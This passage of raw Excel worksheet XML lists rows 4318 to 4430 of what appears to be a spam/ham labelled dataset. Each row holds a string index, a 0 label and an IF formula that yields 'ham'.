        <v>3680</v>
      </c>
      <c r="B4318">
        <v>0</v>
      </c>
      <c r="C4318" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4319" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4319" t="s">
        <v>3681</v>
      </c>
      <c r="B4319">
        <v>0</v>
      </c>
      <c r="C4319" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4320" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4320" t="s">
        <v>3682</v>
      </c>
      <c r="B4320">
        <v>0</v>
      </c>
      <c r="C4320" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4321" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4321" t="s">
        <v>3683</v>
      </c>
      <c r="B4321">
        <v>0</v>
      </c>
      <c r="C4321" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4322" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4322" t="s">
        <v>3684</v>
      </c>
      <c r="B4322">
        <v>0</v>
      </c>
      <c r="C4322" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4323" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4323" t="s">
        <v>3685</v>
      </c>
      <c r="B4323">
        <v>0</v>
      </c>
      <c r="C4323" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4324" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4324" t="s">
        <v>3686</v>
      </c>
      <c r="B4324">
        <v>0</v>
      </c>
      <c r="C4324" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4325" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4325" t="s">
        <v>3687</v>
      </c>
      <c r="B4325">
        <v>0</v>
      </c>
      <c r="C4325" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4326" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4326" t="s">
        <v>3688</v>
      </c>
      <c r="B4326">
        <v>0</v>
      </c>
      <c r="C4326" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4327" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4327" t="s">
        <v>3689</v>
      </c>
      <c r="B4327">
        <v>0</v>
      </c>
      <c r="C4327" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4328" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4328" t="s">
        <v>3690</v>
      </c>
      <c r="B4328">
        <v>0</v>
      </c>
      <c r="C4328" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4329" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4329" t="s">
        <v>3691</v>
      </c>
      <c r="B4329">
        <v>0</v>
      </c>
      <c r="C4329" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4330" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4330" t="s">
        <v>3692</v>
      </c>
      <c r="B4330">
        <v>0</v>
      </c>
      <c r="C4330" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4331" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4331" t="s">
        <v>3693</v>
      </c>
      <c r="B4331">
        <v>0</v>
      </c>
      <c r="C4331" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4332" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4332" t="s">
        <v>3694</v>
      </c>
      <c r="B4332">
        <v>0</v>
      </c>
      <c r="C4332" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4333" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4333" t="s">
        <v>3695</v>
      </c>
      <c r="B4333">
        <v>0</v>
      </c>
      <c r="C4333" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4334" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4334" t="s">
        <v>3696</v>
      </c>
      <c r="B4334">
        <v>0</v>
      </c>
      <c r="C4334" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4335" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4335" t="s">
        <v>3697</v>
      </c>
      <c r="B4335">
        <v>0</v>
      </c>
      <c r="C4335" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4336" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4336" t="s">
        <v>3698</v>
      </c>
      <c r="B4336">
        <v>0</v>
      </c>
      <c r="C4336" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4337" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4337" t="s">
        <v>3699</v>
      </c>
      <c r="B4337">
        <v>0</v>
      </c>
      <c r="C4337" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4338" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4338" t="s">
        <v>3700</v>
      </c>
      <c r="B4338">
        <v>0</v>
      </c>
      <c r="C4338" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4339" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4339" t="s">
        <v>3701</v>
      </c>
      <c r="B4339">
        <v>0</v>
      </c>
      <c r="C4339" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4340" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4340" t="s">
        <v>3702</v>
      </c>
      <c r="B4340">
        <v>0</v>
      </c>
      <c r="C4340" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4341" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4341" t="s">
        <v>3703</v>
      </c>
      <c r="B4341">
        <v>0</v>
      </c>
      <c r="C4341" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4342" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4342" t="s">
        <v>3704</v>
      </c>
      <c r="B4342">
        <v>0</v>
      </c>
      <c r="C4342" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4343" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4343" t="s">
        <v>3705</v>
      </c>
      <c r="B4343">
        <v>0</v>
      </c>
      <c r="C4343" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4344" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4344" t="s">
        <v>3706</v>
      </c>
      <c r="B4344">
        <v>0</v>
      </c>
      <c r="C4344" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4345" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4345" t="s">
        <v>3707</v>
      </c>
      <c r="B4345">
        <v>0</v>
      </c>
      <c r="C4345" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4346" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4346" t="s">
        <v>3708</v>
      </c>
      <c r="B4346">
        <v>0</v>
      </c>
      <c r="C4346" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4347" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4347" t="s">
        <v>3709</v>
      </c>
      <c r="B4347">
        <v>0</v>
      </c>
      <c r="C4347" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4348" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4348" t="s">
        <v>3710</v>
      </c>
      <c r="B4348">
        <v>0</v>
      </c>
      <c r="C4348" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4349" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4349" t="s">
        <v>3711</v>
      </c>
      <c r="B4349">
        <v>0</v>
      </c>
      <c r="C4349" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4350" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4350" t="s">
        <v>3712</v>
      </c>
      <c r="B4350">
        <v>0</v>
      </c>
      <c r="C4350" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4351" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4351" t="s">
        <v>3713</v>
      </c>
      <c r="B4351">
        <v>0</v>
      </c>
      <c r="C4351" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4352" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4352" t="s">
        <v>3714</v>
      </c>
      <c r="B4352">
        <v>0</v>
      </c>
      <c r="C4352" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4353" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4353" t="s">
        <v>3715</v>
      </c>
      <c r="B4353">
        <v>0</v>
      </c>
      <c r="C4353" t="str">
        <f t="shared" si="67"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4354" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4354" t="s">
        <v>3716</v>
      </c>
      <c r="B4354">
        <v>0</v>
      </c>
      <c r="C4354" t="str">
        <f t="shared" ref="C4354:C4417" si="68">IF(B4354="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="4355" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4355" t="s">
        <v>3717</v>
      </c>
      <c r="B4355">
        <v>0</v>
      </c>
      <c r="C4355" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4356" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4356" t="s">
        <v>3718</v>
      </c>
      <c r="B4356">
        <v>0</v>
      </c>
      <c r="C4356" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4357" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4357" t="s">
        <v>3719</v>
      </c>
      <c r="B4357">
        <v>0</v>
      </c>
      <c r="C4357" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4358" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4358" t="s">
        <v>3720</v>
      </c>
      <c r="B4358">
        <v>0</v>
      </c>
      <c r="C4358" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4359" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4359" t="s">
        <v>3721</v>
      </c>
      <c r="B4359">
        <v>0</v>
      </c>
      <c r="C4359" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4360" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4360" t="s">
        <v>3722</v>
      </c>
      <c r="B4360">
        <v>0</v>
      </c>
      <c r="C4360" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4361" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4361" t="s">
        <v>3723</v>
      </c>
      <c r="B4361">
        <v>0</v>
      </c>
      <c r="C4361" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4362" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4362" t="s">
        <v>3724</v>
      </c>
      <c r="B4362">
        <v>0</v>
      </c>
      <c r="C4362" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4363" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4363" t="s">
        <v>3725</v>
      </c>
      <c r="B4363">
        <v>0</v>
      </c>
      <c r="C4363" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4364" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4364" t="s">
        <v>3726</v>
      </c>
      <c r="B4364">
        <v>0</v>
      </c>
      <c r="C4364" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4365" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4365" t="s">
        <v>3727</v>
      </c>
      <c r="B4365">
        <v>0</v>
      </c>
      <c r="C4365" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4366" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4366" t="s">
        <v>3728</v>
      </c>
      <c r="B4366">
        <v>0</v>
      </c>
      <c r="C4366" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4367" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4367" t="s">
        <v>3729</v>
      </c>
      <c r="B4367">
        <v>0</v>
      </c>
      <c r="C4367" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4368" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4368" t="s">
        <v>3730</v>
      </c>
      <c r="B4368">
        <v>0</v>
      </c>
      <c r="C4368" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4369" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4369" t="s">
        <v>3731</v>
      </c>
      <c r="B4369">
        <v>0</v>
      </c>
      <c r="C4369" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4370" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4370" t="s">
        <v>3732</v>
      </c>
      <c r="B4370">
        <v>0</v>
      </c>
      <c r="C4370" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4371" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4371" t="s">
        <v>3733</v>
      </c>
      <c r="B4371">
        <v>0</v>
      </c>
      <c r="C4371" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4372" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4372" t="s">
        <v>3734</v>
      </c>
      <c r="B4372">
        <v>0</v>
      </c>
      <c r="C4372" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4373" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4373" t="s">
        <v>3735</v>
      </c>
      <c r="B4373">
        <v>0</v>
      </c>
      <c r="C4373" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4374" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4374" t="s">
        <v>3736</v>
      </c>
      <c r="B4374">
        <v>0</v>
      </c>
      <c r="C4374" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4375" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4375" t="s">
        <v>3737</v>
      </c>
      <c r="B4375">
        <v>0</v>
      </c>
      <c r="C4375" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4376" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4376" t="s">
        <v>3738</v>
      </c>
      <c r="B4376">
        <v>0</v>
      </c>
      <c r="C4376" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4377" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4377" t="s">
        <v>3739</v>
      </c>
      <c r="B4377">
        <v>0</v>
      </c>
      <c r="C4377" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4378" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4378" t="s">
        <v>3740</v>
      </c>
      <c r="B4378">
        <v>0</v>
      </c>
      <c r="C4378" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4379" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4379" t="s">
        <v>3741</v>
      </c>
      <c r="B4379">
        <v>0</v>
      </c>
      <c r="C4379" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4380" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4380" t="s">
        <v>3742</v>
      </c>
      <c r="B4380">
        <v>0</v>
      </c>
      <c r="C4380" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4381" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4381" t="s">
        <v>3743</v>
      </c>
      <c r="B4381">
        <v>0</v>
      </c>
      <c r="C4381" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4382" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4382" t="s">
        <v>3744</v>
      </c>
      <c r="B4382">
        <v>0</v>
      </c>
      <c r="C4382" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4383" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4383" t="s">
        <v>3745</v>
      </c>
      <c r="B4383">
        <v>0</v>
      </c>
      <c r="C4383" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4384" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4384" t="s">
        <v>3746</v>
      </c>
      <c r="B4384">
        <v>0</v>
      </c>
      <c r="C4384" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4385" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4385" t="s">
        <v>3747</v>
      </c>
      <c r="B4385">
        <v>0</v>
      </c>
      <c r="C4385" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4386" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4386" t="s">
        <v>3748</v>
      </c>
      <c r="B4386">
        <v>0</v>
      </c>
      <c r="C4386" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4387" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4387" t="s">
        <v>3749</v>
      </c>
      <c r="B4387">
        <v>0</v>
      </c>
      <c r="C4387" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4388" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4388" t="s">
        <v>3750</v>
      </c>
      <c r="B4388">
        <v>0</v>
      </c>
      <c r="C4388" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4389" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4389" t="s">
        <v>3751</v>
      </c>
      <c r="B4389">
        <v>0</v>
      </c>
      <c r="C4389" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4390" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4390" t="s">
        <v>3752</v>
      </c>
      <c r="B4390">
        <v>0</v>
      </c>
      <c r="C4390" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4391" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4391" t="s">
        <v>3753</v>
      </c>
      <c r="B4391">
        <v>0</v>
      </c>
      <c r="C4391" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4392" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4392" t="s">
        <v>3754</v>
      </c>
      <c r="B4392">
        <v>0</v>
      </c>
      <c r="C4392" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4393" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4393" t="s">
        <v>3755</v>
      </c>
      <c r="B4393">
        <v>0</v>
      </c>
      <c r="C4393" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4394" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4394" t="s">
        <v>3756</v>
      </c>
      <c r="B4394">
        <v>0</v>
      </c>
      <c r="C4394" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4395" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4395" t="s">
        <v>3757</v>
      </c>
      <c r="B4395">
        <v>0</v>
      </c>
      <c r="C4395" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4396" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4396" t="s">
        <v>3758</v>
      </c>
      <c r="B4396">
        <v>0</v>
      </c>
      <c r="C4396" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4397" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4397" t="s">
        <v>3759</v>
      </c>
      <c r="B4397">
        <v>0</v>
      </c>
      <c r="C4397" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4398" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4398" t="s">
        <v>3760</v>
      </c>
      <c r="B4398">
        <v>0</v>
      </c>
      <c r="C4398" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4399" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4399" t="s">
        <v>21</v>
      </c>
      <c r="B4399">
        <v>0</v>
      </c>
      <c r="C4399" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4400" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4400" t="s">
        <v>21</v>
      </c>
      <c r="B4400">
        <v>0</v>
      </c>
      <c r="C4400" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4401" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4401" t="s">
        <v>21</v>
      </c>
      <c r="B4401">
        <v>0</v>
      </c>
      <c r="C4401" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4402" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4402" t="s">
        <v>21</v>
      </c>
      <c r="B4402">
        <v>0</v>
      </c>
      <c r="C4402" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4403" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4403" t="s">
        <v>21</v>
      </c>
      <c r="B4403">
        <v>0</v>
      </c>
      <c r="C4403" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4404" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4404" t="s">
        <v>21</v>
      </c>
      <c r="B4404">
        <v>0</v>
      </c>
      <c r="C4404" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4405" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4405" t="s">
        <v>21</v>
      </c>
      <c r="B4405">
        <v>0</v>
      </c>
      <c r="C4405" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4406" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4406" t="s">
        <v>21</v>
      </c>
      <c r="B4406">
        <v>0</v>
      </c>
      <c r="C4406" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4407" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4407" t="s">
        <v>3761</v>
      </c>
      <c r="B4407">
        <v>0</v>
      </c>
      <c r="C4407" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4408" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4408" t="s">
        <v>3762</v>
      </c>
      <c r="B4408">
        <v>0</v>
      </c>
      <c r="C4408" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4409" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4409" t="s">
        <v>21</v>
      </c>
      <c r="B4409">
        <v>0</v>
      </c>
      <c r="C4409" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4410" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4410" t="s">
        <v>3763</v>
      </c>
      <c r="B4410">
        <v>0</v>
      </c>
      <c r="C4410" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4411" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4411" t="s">
        <v>3764</v>
      </c>
      <c r="B4411">
        <v>0</v>
      </c>
      <c r="C4411" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4412" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4412" t="s">
        <v>3765</v>
      </c>
      <c r="B4412">
        <v>0</v>
      </c>
      <c r="C4412" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4413" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4413" t="s">
        <v>3764</v>
      </c>
      <c r="B4413">
        <v>0</v>
      </c>
      <c r="C4413" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4414" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4414" t="s">
        <v>3766</v>
      </c>
      <c r="B4414">
        <v>0</v>
      </c>
      <c r="C4414" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4415" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4415" t="s">
        <v>3767</v>
      </c>
      <c r="B4415">
        <v>0</v>
      </c>
      <c r="C4415" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4416" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4416" t="s">
        <v>3768</v>
      </c>
      <c r="B4416">
        <v>0</v>
      </c>
      <c r="C4416" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4417" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4417" t="s">
        <v>3769</v>
      </c>
      <c r="B4417">
        <v>0</v>
      </c>
      <c r="C4417" t="str">
        <f t="shared" si="68"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4418" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4418" t="s">
        <v>3770</v>
      </c>
      <c r="B4418">
        <v>0</v>
      </c>
      <c r="C4418" t="str">
        <f t="shared" ref="C4418:C4481" si="69">IF(B4418="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="4419" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4419" t="s">
        <v>3771</v>
      </c>
      <c r="B4419">
        <v>0</v>
      </c>
      <c r="C4419" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4420" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4420" t="s">
        <v>3772</v>
      </c>
      <c r="B4420">
        <v>0</v>
      </c>
      <c r="C4420" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4421" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4421" t="s">
        <v>3773</v>
      </c>
      <c r="B4421">
        <v>0</v>
      </c>
      <c r="C4421" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4422" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4422" t="s">
        <v>3774</v>
      </c>
      <c r="B4422">
        <v>0</v>
      </c>
      <c r="C4422" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4423" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4423" t="s">
        <v>3775</v>
      </c>
      <c r="B4423">
        <v>0</v>
      </c>
      <c r="C4423" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4424" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4424" t="s">
        <v>3776</v>
      </c>
      <c r="B4424">
        <v>0</v>
      </c>
      <c r="C4424" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4425" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4425" t="s">
        <v>3777</v>
      </c>
      <c r="B4425">
        <v>0</v>
      </c>
      <c r="C4425" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4426" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4426" t="s">
        <v>3778</v>
      </c>
      <c r="B4426">
        <v>0</v>
      </c>
      <c r="C4426" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4427" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4427" t="s">
        <v>3779</v>
      </c>
      <c r="B4427">
        <v>0</v>
      </c>
      <c r="C4427" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4428" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4428" t="s">
        <v>3780</v>
      </c>
      <c r="B4428">
        <v>0</v>
      </c>
      <c r="C4428" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4429" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4429" t="s">
        <v>3781</v>
      </c>
      <c r="B4429">
        <v>0</v>
      </c>
      <c r="C4429" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4430" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4430" t="s">
        <v>3782</v>
      </c>
      <c r="B4430">
        <v>0</v>
      </c>
      <c r="C4430" t="str">
